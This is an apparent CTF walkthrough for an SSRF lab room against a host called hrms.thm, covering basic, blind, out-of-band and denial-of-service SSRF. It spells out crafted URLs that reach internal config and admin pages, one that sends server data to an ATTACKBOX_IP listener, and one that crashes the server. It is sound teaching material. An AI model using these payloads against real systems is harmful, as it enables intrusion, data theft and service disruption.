SSRF
Discover the inner workings of SSRF and explore multiple exploitation techniques.
Last updated
Discover the inner workings of SSRF and explore multiple exploitation techniques.
Last updated
SSRF is a web application security vulnerability that allows the attacker to force the server to make unauthorised requests to any local or external source on behalf of the web server. SSRF allows an attacker to interact with internal systems, potentially leading to data leaks, service disruption, or even remote code execution.
Learning Objectives
Understanding the workings of SSRF
Practically testing various types of SSRF
Few important tools for exploitation
Key mitigation and defensive measures
Basic SSRF is a web attack technique where an attacker tricks a server into making requests on their behalf, often targeting internal systems or third-party services. By exploiting vulnerabilities in input validation, the attacker can gain unauthorised access to sensitive information or control over remote resources, posing a significant security risk to the targeted application and its underlying infrastructure.
Fairly straight forward. Follow the instructions given in the room and you should get the answers.
Change the link http://hrms.thm/?url=localhost/copyright to http://hrms.thm/?url=localhost/config as instructed. This should give you the answers to the questions.
Answer the questions below
Follow the given instructions.
From previous task we know there exists admin.php. We cannot acces it directly.
We can check the source of the HTML, the dropdown takes the URL from an internal system and renders the data. The details of all employees are being rendered from http://192.168.2.10/employees.php and http://192.168.2.10/salary.php.
We can change this to /admin.php.
Once the value is updated we can choose that in the drop down menu and we should get our flag.
Answer the questions below
Blind SSRF refers to a scenario where the attacker can send requests to a target server, but they do not receive direct responses or feedback about the outcome of their requests. In other words, the attacker is blind to the server's responses.
This type of SSRF can be more challenging to exploit because the attacker cannot directly see the results of their actions. We will discuss its various examples.
Out-of-band SSRF is a technique where the attacker leverages a separate, out-of-band communication channel instead of directly receiving responses from the target server to receive information or control the exploited server.
This approach is practical when the server's responses are not directly accessible to the attacker.
This again is a fairly straightforward. Follow all the instructions given.
How it works
Once again, log in to the dashboard and click on the Profile tab in the navigation bar. We will see that it redirects to http://hrms.thm/profile.php?url=localhost/getInfo.php, which displays a message that data is being sent.
What is happening here? Once we load profile.php, it sends data to an external page named getInfo.php, which is probably used for analytics or logs.
Here, an attacker can redirect the request to their server, thus getting additional information about the server for exploitation or data pilferage.
Create server.py as instructed with the code that is given.
The given code will receive all the content and save it to a file data.html on the server.
Now open the browser and open http://hrms.thm/profile.php?url=http://ATTACKBOX_IP:8080, which will log the data in the data.html. data.html file, which contains all the essential information related to the server that can be used to launch further attacks.
Answer the questions below
One scenario and attacker could abuse SSRF, is by crashing the server or creating a denial of service for other hosts.
There are multiple instances (WordPress, CairoSVG) where attackers try to disrupt the availability of a system by launching SSRF attacks. We will see how a complete server crash can occur through forged requests to a vulnerable server.
Again very straightforward instructions.
How it works
Once we log in to the dashboard, we will see a tab called Training in the navigation bar, which is used to load the training content for the employees.
Once we click on that tab, we will see that it redirects to the URL http://hrms.thm/url.php=192.168.2.10/trainingbanner.jpg, which shows training content.
We notice that the url.php file is loading external content displayed here. What if we try to load any other content?
Try opening the file http://hrms.thm/url.php?id=10.10.10.10. Great! - it opened the file for you.
Now that we know the server is vulnerable to basic SSRF, let's explore the code of url.php to make it crash the server.
The above code shows that the url.php loads an image; if the image size exceeds 100KB, it shows a memory outage message and throws an error.
Let's try to crash the server by loading an image greater than 100 KB. For your convenience, we already have such an image available, which you can forge via http://hrms.thm/url.php?id=192.168.2.10/bigImage.jpg.
Answer the questions below
Answer the questions below
